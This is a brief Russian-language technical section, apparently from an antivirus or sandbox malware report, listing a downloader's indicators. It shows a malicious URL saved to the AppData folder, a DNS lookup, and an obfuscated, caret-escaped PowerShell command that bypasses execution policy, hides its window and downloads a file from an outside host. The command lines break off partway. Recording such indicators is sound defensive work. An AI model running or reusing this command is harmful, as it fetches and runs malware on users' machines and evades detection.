Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWER^sHe^Ll.E^xE -Exe^c^UT^iOn^POlicy By^PASS ^-NOProfi^LE ^-^w^iN^DoWsT^ylE h^IdD^En (^nE^W-objEc^T^ sysT^em.n^ET^.Webc^Li^eN^t^)^.^D^o^wnlO^a^D^FILe('http://www.doorasop...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pOWER^sHe^Ll.E^xE -Exe^c^UT^iOn^POlicy By^PASS ^-NOProfi^LE ^-^w^iN^DoWsT^ylE h^IdD^En (^nE^W-objEc^T^ sysT^em.n^ET^.Webc^Li^eN^t^)^.^D^o^wnlO^a^D^FILe('http://www.doorasop...' (со скрытым окном)